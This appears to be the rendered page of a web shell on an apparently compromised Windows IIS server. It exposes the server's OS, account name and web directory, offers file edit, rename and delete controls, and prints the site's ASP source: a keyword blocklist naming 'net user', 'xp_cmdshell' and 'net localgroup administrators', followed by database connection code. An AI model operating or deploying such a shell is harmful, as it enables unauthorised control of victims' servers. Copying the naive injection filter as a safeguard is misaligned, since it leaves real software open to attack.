Webshell Akmal archtte id

System: Microsoft Windows NT 10.0.20348.0

Server: Microsoft-IIS/10.0

User: buyyou

Directory: C:\MyData\WWW\asc365\

Name	Size	Type	Actions
ASC365_CANADA	-	Directory	Rename Delete
ASC365_Store01	-	Directory	Rename Delete
aspnet_client	-	Directory	Rename Delete
CompanyImage	-	Directory	Rename Delete
TJGS_USA	-	Directory	Rename Delete
zhijian	-	Directory	Rename Delete
Memo.inc	0 bytes	.inc	Edit Rename Delete
web.config	213 bytes	.config	Edit Rename Delete

<%
on error resume next
'防止注入
dim qs,errc,iii
qs=request.servervariables("query_string")
'response.write(qs)
dim deStr(18)
deStr(0)="net user"
deStr(1)="xp_cmdshell"
deStr(2)="/add"
deStr(3)="exec%20master.dbo.xp_cmdshell"
deStr(4)="net localgroup administrators"
deStr(5)="select"
deStr(6)="count"
deStr(7)="asc"
deStr(8)="char"
deStr(9)="mid"
deStr(10)="'"
deStr(11)=":"
deStr(12)=""""
deStr(13)="insert"
deStr(14)="delete"
deStr(15)="drop"
deStr(16)="truncate"
deStr(17)="from"
deStr(18)="%"
errc=false
for iii= 0 to ubound(deStr)
if instr(qs,deStr(iii))<>0 then
errc=true
end if
next
if errc then
'Response.Write "<script>location.href='/index.asp'<script>" 
Response.Write("")
Response.end
end if
    dim conn
    dim connstr
    dim mypath
    mypath=server.mappath("../data/test.mdb")
    Set conn = Server.CreateObject("ADODB.Connection")
    strCon = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & mypath
	if err.number>0 then 
	   err.clear
	   set conn=nothing
	   'Response.write "<script>location.href='/index.asp'<script>"
	   Response.Write("")
	   Response.End
	else
		conn.open strCon
		if err then
		   err.clear
		   set conn=nothing
		   'Response.write "<script>location.href='/index.asp'<script>"
		   Response.Write("<center>3、网站数据库更新中...</center>")
		   Response.End 
		end if
	end if